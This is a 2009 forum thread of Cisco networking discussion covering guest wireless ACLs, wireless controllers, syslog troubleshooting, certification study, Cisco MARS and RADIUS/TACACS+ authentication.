|
CrazyLittle posted:This scares me. Such are the risks of running end of life gear.
|
# ? Feb 17, 2009 13:33 |
|
|
# ? May 22, 2024 13:44 |
|
I'm working on building a "guest" WLAN. The WLAN has it's own subnet and associated VLAN. Would you all suggest building the ACLs on the controller or on our core switch?
|
# ? Feb 17, 2009 17:46 |
|
Best practice says to avoid ACLs in the Core. But I think wireless is the exception. However depending on your controller, if it will let you do ACLs on it, then go for it.
|
# ? Feb 17, 2009 18:00 |
|
InferiorWang posted:I'm working on building a "guest" WLAN. The WLAN has it's own subnet and associated VLAN. Would you all suggest building the ACLs on the controller or on our core switch? Well, I assume you're using Cisco LWAPP gear- are you talking about the pre-authentication ACL, or the post-authentication ACL? The WLCs have the ability to provide for both. We're currently going through a similar exercise, and we've decided to impose the preauthentication ACL on the controller, because that's where it makes the most sense, really, and then provide for production filtering via our normal production access control appliances (Nokias). Once you land your guest traffic onto a wired VLAN, I would suggest treating it as you would any normal wired VLAN, and apply your access control wherever you would normally.
|
# ? Feb 17, 2009 18:16 |
|
Speaking of controllers, at what point does one make sense and where do you put it? We will have, after this month, a total of 53 1130AGs in the field all on multiple VLANs with at least 2 SSIDs. Can a controller even handle that many APs?
|
# ? Feb 17, 2009 18:20 |
|
Syano posted:Speaking of controllers, at what point does one make sense and where do you put it? Physically? I have ours racked in the same rack as our 4507R core. It's linked up to a gig port on the core. Yes, a controller can handle that many APs, but you have to make sure you get one that will support that many. Our 4400 supports up to 25 with multiple SSIDs and all that. jwh posted:Well, I assume you're using Cisco LWAPP gear- are you talking about the pre-authentication ACL, or the post-authentication ACL? The WLCs have the ability to provide for both. Post authentication...I think. I'm thinking a simple WEP key for the guest wlan and an ACL that will only let the clients get outbound to ports 80/443/53 for simple web browsing. Whe we have auditors or presenters, many want internet access and I thought a locked down VLAN would be the best bet. The WEP is merely in place to stop any accidental connections since a couple of our building are within close distance to residential areas.
|
# ? Feb 17, 2009 19:04 |
|
InferiorWang posted:Post authentication...I think. I'm thinking a simple WEP key for the guest wlan and an ACL that will only let the clients get outbound to ports 80/443/53 for simple web browsing. Whe we have auditors or presenters, many want internet access and I thought a locked down VLAN would be the best bet. The WEP is merely in place to stop any accidental connections since a couple of our building are within close distance to residential areas. At least run WPA.
|
# ? Feb 17, 2009 19:18 |
|
routenull0 posted:At least run WPA. Good call. WPA2 is a no go because it seems that some versions of Windows will not support that. Most have plain WPA support.
|
# ? Feb 17, 2009 19:21 |
|
I believe the latest builds of aircrack-ng have WPA crack built in now, but worse case, you'll just be giving away free internet.
|
# ? Feb 17, 2009 19:25 |
|
InferiorWang posted:Post authentication...I think. I'm thinking a simple WEP key for the guest wlan and an ACL that will only let the clients get outbound to ports 80/443/53 for simple web browsing. Whe we have auditors or presenters, many want internet access and I thought a locked down VLAN would be the best bet. The WEP is merely in place to stop any accidental connections since a couple of our building are within close distance to residential areas. I'd build your access control where it's easiest for your to administer. That might be the controller, or it might not. Have you enabled the guest vlan feature on the controller for this SSID? You can configure a couple of different authentication databases- I've tested local, and we're working up radius to ACS this week or next. Basically, when a client associates to the SSID, the preauthentication ACL is in play, and when the client tries to web browse to somewhere, the controller will intercept and present the portal login. Provided the client authenticates successfully, the preauthentication acl comes down. This, in combination with blocking client-to-client communication on that SSID (it's a checkbox somewhere in the ssid configuration) seems to work pretty well. You can also dynamically land users into the appropriate VLAN, based on tunnel-private-group-id attributes in RADIUS, but I haven't tested whether that works in conjunction with the Guest VLAN feature of the WLCs. That's a nice feature though, because you can present a single SSID, and the WLC will drop users into the appropriate wired-side VLAN based on returned attributes. Syano posted:Speaking of controllers, at what point does one make sense and where do you put it? Probably the biggest reason to migrate to lightweight is for the simplified radio management, but lightweight is a very different beast, and it may not be very comfortable- especially at first. If you really want to get your feet wet with lightweight, you can get a 2106 for about $1800, and it'll handle six lightweight APs (which could include some of your 1131AGs). For your radio count, though, you're going to need to look at a 4400.
|
# ? Feb 17, 2009 19:43 |
|
jwh posted:I'd build your access control where it's easiest for your to administer. That might be the controller, or it might not. We have few instances where we actually need guest access, but enough to make my life easier if I come up with a straight forward way to authorize certain people using some sort of basic authentication. I'm mucking around with web authentication using a 'local net user' I entered into the WLC's web tool. I have a couple of questions if you have a spare moment: - If I use web authentication and just have a generic local net user, I'm assuming then that I don't need to put encryption on the GUEST wireless lan as it won't let me do anything outside of DNS lookups before I authenticate via the web? If that's the case, I'm not understanding what the preauthentication ACL would be used for then. If the user can't do anything after associating with a WLAN but before web authentication, then why would you need the preauthentication ACL? - From then, I really want to set the ACL at the interface I created? That would be consider post-authentication at that point. - Is what I'm proposing any different than creating a WLAN with the "Guest LAN" option checked? Thanks
|
# ? Feb 17, 2009 22:02 |
|
InferiorWang posted:- If I use web authentication and just have a generic local net user, I'm assuming then that I don't need to put encryption on the GUEST wireless lan as it won't let me do anything outside of DNS lookups before I authenticate via the web? Well, whether you encrypt the SSID or not is up to you- you could probably make the argument either way. I'm of the mind that the only encryption worth having is WPA2, and when it comes to guest user access, that's just another thing that is going to cause trouble by not working correctly. But that's just me, and none of our guest wireless architecture has been approved by my IT security group (yet). So you don't need to encrypt that SSID, but you could. My lab SSID is actually WEP+Webauth currently, just because I wanted to broadcast the SSID, but I didn't want people joining it by accident. InferiorWang posted:If that's the case, I'm not understanding what the preauthentication ACL would be used for then. If the user can't do anything after associating with a WLAN but before web authentication, then why would you need the preauthentication ACL? InferiorWang posted:- From then, I really want to set the ACL at the interface I created? That would be consider post-authentication at that point. InferiorWang posted:- Is what I'm proposing any different than creating a WLAN with the "Guest LAN" option checked?
|
# ? Feb 17, 2009 22:44 |
|
jwh posted:My lab SSID is actually WEP+Webauth currently, just because I wanted to broadcast the SSID, but I didn't want people joining it by accident. That is one of my aims as well. quote:Well, that's what depends- as near as I can tell, if you're doing an external portal, you need to craft the preauth acl to allow that traffic to make it to that destination, otherwise the WLC will stomp it. I've never tested an external authentication portal though, and have no idea how it works. I guess you could craft a preauthentication ACL to also allow for some traffic unauthenticated, if you wanted. To answer your question, however, you don't "need it". The WLC onboard portal works fine without specifying a preauthentication ACL. That makes sense. I'm sticking with the onboard portal. quote:Right, if you go into your WLC, under Controller -> Interfaces, you'll have the option of applying an ACL to an interface. You need to build the ACL first in Security -> Access Control Lists -> Access Control Lists. Whether or not you want to manage your ACL on the controller is up to you. Personally, I think the way the WLCs craft ACLs is kind of wonky, but if you don't need a lot of ACLs, it could work for you. The other WLANs, all one other thus far anyway, are considered trusted so I'll rely on switch level access lists for those. The guest wlan is a bit of an oddball so I'm going to try and leave the ACLs at the controller. Sounds good in my own head anyway. quote:Not really, I guess. The onboard guest portal is pretty nice, so I'd use it if you can. No sense reinventing the wheel, right? There's a guest lan check box when you create a new interface on the controller. I'm still not clear on what that option does. The doc I read didn't make it entirely clear. Guess I have to do some more digging.
|
# ? Feb 18, 2009 00:15 |
|
Anyone else excited about the Richards Zeta acquisition and EnergyWise? Any idea when 12.2(50)SE will be released?
|
# ? Feb 18, 2009 09:09 |
|
jwh posted:Have you seen similar behavior outside the T train? T train is the pain train. Well, its been a few days and the error message isn't showing up in the logs. It was quite frequent so would have shown up by now. What is somewhat confusing is that there are three of these routers, all with the same hardware build and IOS image. Only 1 is giving the error, and it was the one that got cooked. Oh well, we got our RoI on that sucker. Over 6 years it was only rebooted for new IOS images. Still going to replace all three of the 3660's, maybe snag one for the home study. Thanks for suggesting to zap in another image, I had thought this was all hardware. Cheers
|
# ? Feb 18, 2009 15:03 |
|
Ok so I set up a syslog server today and enabled logging on my core router and started receiving syslogs. Next, I move to one of my remote routers, enable logging, and nada. I dick around with it for about an hour and finally have a vendor confirm he can receive syslogs from the device (an 1841 ISR by the way) but I still can't. As is the case a lot of the times, I figure I move on to the next project and let this problem marinate til I figure out whats up. Well, my next project is starting to archive configs of these same devices. So I fire up Pumpkin, log in to the same 1841 and try to tftp the config. Again, nada. Session times out with no bytes transferred. Then it hit me, syslog and tftp are both UDP traffic. What in the world could be preventing UDP traffic from coming across this link? For the details it is a point to point T1 with an 1841 at the remote site and an Adtran Netvanta 3200 at the home site. Both routers are pretty darn vanilla with their configs. No fancy ACLs or what not. The remote router has PBR enabled but that is about the only thing out of what I would call the ordinary. Could dhcp relay be redirecting all UDP traffic instead of just dhcp? I know this is not strictly a Cisco question but I hated to start a new thread just for this small issue.
|
# ? Feb 21, 2009 04:02 |
|
Craft an acl to match syslog traffic, and then term mon, followed by debug ip pack xxx detailed where xxx is your acl you created. Make your acl as specific as possible, because routers hate debug ip packet. You'll want to make sure the router is trying to send the syslog data in the first place, and then figure out whether the next device is seeing those packets.
|
# ? Feb 21, 2009 07:12 |
|
jwh posted:Craft an acl to match syslog traffic, and then term mon, followed by debug ip pack xxx detailed where xxx is your acl you created. Make your acl as specific as possible, because routers hate debug ip packet. Excellent. Debugging is something new for me in my journey through the world of Cisco. Looks like I have a project come Monday morning
|
# ? Feb 21, 2009 15:31 |
|
Got a few questions for you guys. Until last week I had no experience with Cisco MARS. My boss expressed to me that several clients of ours had interest in MARS consulting, so I decided to check it out to see if it was something we should or could do. A contact of mine set me up with a MARS appliance on loan for a little while so I spent the weekend getting it up and running and getting acquainted with the CLI and GUI. I have experience using and administering HP Openview in a decently sized service provider environment so the concept of NMS isn't foreign. I haven't had time to do much beyond interfacing it with one router and configuring it for user access but over the next few days I will spend a lot more time working with it. I'm reading all of the Cisco-provided material (user guide, config guide, startup guide, etc) as well as the two Cisco Press books on MARS and it all seems pretty straight forward. Does anyone have any experience administering MARS in a working environment? I'm curious to know any tips and tricks that have been found, or potential pitfalls that could be avoided. Also, anyone got a cheap ASA 5505 (or any cheap ASA at all) for sale or know where I can get one? Paul Boz_ fucked around with this message at 05:27 on Feb 23, 2009 |
# ? Feb 23, 2009 05:22 |
|
Paul Boz_ posted:I have experience using and administering HP Openview in a decently sized service provider environment so the concept of NMS isn't foreign. I've looked at MARS several times, and we've also looked at Q1, and CheckPoint's offering. I think they're all terribly expensive for what you get, and none of them solve the problem of having to hire an additional full time employee just to babysit the installation. Paul Boz_ posted:Also, anyone got a cheap ASA 5505 (or any cheap ASA at all) for sale or know where I can get one?
|
# ? Feb 23, 2009 17:31 |
|
Stupid question: How difficult would it be for someone with a good deal of functional network knowledge but absolutely no hands-on cisco experience to gun for a CCNP cert? I have a lab with 2800s, 6509s, and ASAs. Background: I am a soon-to-be-unemployed IT security architect currently looking for a job in a location where there is very little for me, but a ton of net eng jobs. I can talk about advanced network architecture and routing concepts all day, but have never been the guy to actually set it up or troubleshoot it. About all I know about cisco commands is that include is grep. Is it ridiculous for me to think that I can pick up a CCNP cert in a month or so?
|
# ? Feb 23, 2009 17:48 |
|
Wizard of Yendor posted:Stupid question: How difficult would it be for someone with a good deal of functional network knowledge but absolutely no hands-on cisco experience to gun for a CCNP cert? I have a lab with 2800s, 6509s, and ASAs. If you feel you have the knowledge, just sit a 14day bootcamp with tests included. They teach you whats on the test, not what should be "known" to a CCNP. You will need to get CCNA first though. You can take the tests for CCNP but will not be granted certificate and title until CCNA has been accomplished.
|
# ? Feb 23, 2009 17:51 |
|
Keep in mind that CCNA is a prerequisite for CCNP, so you need to pass that first. I'd say that CCNP in one month is all but impossible with little to no prior knowledge. Edit: Oh yea, bootcamp.
|
# ? Feb 23, 2009 17:51 |
|
Yeah I realize that I have to pass the CCNA. From talking to my colleagues that will be trivial though. I have found bootcamps to be a waste of time in the past (CISSP), compared to book/practice exam cramming, is there not good published material for CCNP self-paced study?
|
# ? Feb 23, 2009 18:48 |
|
Wizard of Yendor posted:Yeah I realize that I have to pass the CCNA. From talking to my colleagues that will be trivial though. http://www.amazon.com/CCNP-Official-Exam-Certification-Library/dp/158720178X/ref=pd_bbs_sr_1?ie=UTF8&s=books&qid=1235136550&sr=8-1
|
# ? Feb 23, 2009 19:56 |
|
I took the composite followed by the ISCW and ONT within six or seven months. Without hands on experience you can not get a CCNP in a month without cheating. There are tons of sims on each of the exams that sometimes ask you to do more archaic stuff than you are prepared for. The CCIP exams were especially like that. Take it test by test and see where you are. jwh posted:I was under the impression MARS isn't really a NMS in the way that OpenView is- MARS is geared more towards security event correlation. Definitely right about MARS compared to Openview. That's why I'm messing with MARS before I say I know it As far as ASA prices: I'm trying to find something on the used market that I can use in my lab, nothing commercial grade.
|
# ? Feb 23, 2009 23:48 |
|
Paul Boz_ posted:The CCIP exams were especially like that. How were the BGP and MPLS tests anyway?
|
# ? Feb 24, 2009 00:04 |
|
I have a bunch of equipment I'd like to stop having to micro-manage login and passwords on. I ended up finding some walkthroughs online getting it to work with the Microsoft IAS (Radius) implementation in my test environment. Unfortunately I can't get this to work with any setting besides PAP which is unencrypted. The bosses wont stand for that even if it is on a secured network. Is there something else I should be looking into? I was originally going to setup a VM with FreeRadius but the IAS stuff looked pretty straightforward, especially on the DC. Even though it's not Cisco oriented, anyone have any reccomendations on a Radius for Dumbasses book/tutorial? There's nothing on Safari that I see and it's a pretty big huge mindfuck to find a place to start comprehending it.
|
# ? Feb 25, 2009 00:43 |
|
Haydez posted:I have a bunch of equipment I'd like to stop having to micro-manage login and passwords on. I ended up finding some walkthroughs online getting it to work with the Microsoft IAS (Radius) implementation in my test environment. Unfortunately I can't get this to work with any setting besides PAP which is unencrypted. The bosses wont stand for that even if it is on a secured network. Do you need to do this through RADIUS/IAS? If possible have you looked into using TACACS+? (using tac_plus from shrubbery.net) In either case the traffic is 'encrypted' with a shared secret between the client and server, so the only way to recover the password off the wire is to brute force or know that shared secret.
|
# ? Feb 25, 2009 04:40 |
|
Haydez posted:I have a bunch of equipment I'd like to stop having to micro-manage login and passwords on. I ended up finding some walkthroughs online getting it to work with the Microsoft IAS (Radius) implementation in my test environment. Unfortunately I can't get this to work with any setting besides PAP which is unencrypted. The bosses wont stand for that even if it is on a secured network. Did you try to sniff that PAP login? The secret keys you use are to make an md5 hash of the credentials. Granted it's not aes256 encryption, but if this is on private lans I wouldn't (and don't) worry about it. quote:The RADIUS protocol does not transmit passwords in cleartext between the NAS and RADIUS server (not even with PAP protocol). Rather, a shared secret is used along with the MD5 hashing algorithm to obfuscate passwords. Because MD5 is not considered to be a very strong protection of the user's credentials, additional protection - such as IPsec tunnels - should be used to further encrypt the RADIUS traffic. The user's credentials are the only part protected by RADIUS itself, but other user-specific attributes passed by RADIUS may be considered sensitive or private information as well. Please refer to the references for more details on this subject. http://en.wikipedia.org/wiki/RADIUS I use IAS for nas and network authentication, looks great in audits because they are used to a windows format. Tac_plus is great for accounting info. E: Anyone ever experience auth-proxy timers not working when you set them to over 8 hours? Cheers Herv fucked around with this message at 10:48 on Feb 25, 2009 |
# ? Feb 25, 2009 10:37 |
|
routenull0 posted:How were the BGP and MPLS tests anyway? I recall the BGP test had some really exotic MED questions. Somehow I scored over 900 though.
|
# ? Feb 25, 2009 11:44 |
|
I started another thread and got pointed heregwon posted:I've just been told that I'm going offshore in a couple of weeks to install a WAAS box to help with the connection out there. Any tips?
|
# ? Feb 25, 2009 13:18 |
|
We have an opening for a Senior Network Administrator in Southwest Florida. Here is the link: http://www.21stcenturyoncology.com/jobs_nondr.asp quote:
Cisco experience is HUGE for this.
|
# ? Feb 25, 2009 16:50 |
|
routenull0 posted:How were the BGP and MPLS tests anyway? I actually took the composite. It was the worst exam I have taken, by far, at least in terms of difficulty. The SIM questions were using 12.0 IOS so a lot of the commands I tried to use either did not work at all or were not supported. I suppose it was more like the CCIE than any other exams I have taken - you had to know multiple ways to do the same thing, almost to the point of obscurity. Conversely, the CCNA Security was a joke. 4 or 5 SDM questions, everything else multiple choice, under 60 questions. My only problem with that exam was the number of blurry and almost unreadable simlet questions. I had to leave comments on at least three of them. That and my workstation locked up so I had to be moved to a new desk. I found out that the timer doesn't stop when that happens.
|
# ? Feb 25, 2009 17:02 |
|
gwon posted:I started another thread and got pointed here I'm afraid I don't have much advice, but we looked at WAAS code back when it was in beta. It seemed to require a lot more configuration than we had anticipated, and we ended up dropping the evaluation simply because we didn't have the resources internally to work it. I also remember a number of caveats with both dscp preservation and printing, as weird as that sounds. I'm sure (hope) those issues are resolved now. However, Gartner says be careful: http://www.networkworld.com/community/node/33153 BoNNo530 posted:We have an opening for a Senior Network Administrator in Southwest Florida. Here is the link:
|
# ? Feb 25, 2009 18:24 |
|
ragzilla posted:Do you need to do this through RADIUS/IAS? If possible have you looked into using TACACS+? (using tac_plus from shrubbery.net) Herv posted:Did you try to sniff that PAP login? I know about the shared secret part. Unfortunately the boss sees the word unencrypted and that sets off his alarm instantly. I'll check out the TACACS+. If the IAS setup is the better option I'll have to slug it out with the boss. The upper management are overly paranoid about everything to the point that sending out hyperlinks in e-mails is heavily discouraged.
|
# ? Feb 25, 2009 21:05 |
|
Not Cisco but this isn't worth it's own thread. Anyone have any experience with the Foundry Netiron MLX series? We're looking to replace our 6509s with either a MLX-4. It would be doing everything for our data center network. It looks like Foundry had some issues with their older stuff and BGP did they get that all worked out?
|
# ? Feb 26, 2009 01:13 |
|
gwon posted:I started another thread and got pointed here Not sure if you are talking WAAS appliance or one of the other variants. I'd start with the design guide: http://www.cisco.com/en/US/products/ps6474/products_implementation_design_guides_list.html I know how it works for the most part but haven't had the chance to mess with it much. Sorry .
|
# ? Feb 26, 2009 02:10 |
|
FatCow posted:Not Cisco but this isn't worth it's own thread. After the issues one of our customers had on their RX-16 (granted, some were of their own creation- did you know Foundry will build custom code for you if your application breaks/is broken by their code?), I'm glad we stuck to Cisco. Why are you looking to get rid of the 6509s?
|
# ? Feb 26, 2009 05:04 |
|
|
# ? May 22, 2024 13:44 |
|
FatCow posted:It looks like Foundry had some issues with their older stuff and BGP did they get that all worked out? For what it's worth, I was troubleshooting Foundry BGP bugs as of this past June. That said, I didn't have visibility into the code on the NetIron, because I was troubleshooting this from a customer perspective. Yeah. I would say keep your 6509, but then again, you don't say why you're considering getting rid of it.
|
# ? Feb 26, 2009 16:51 |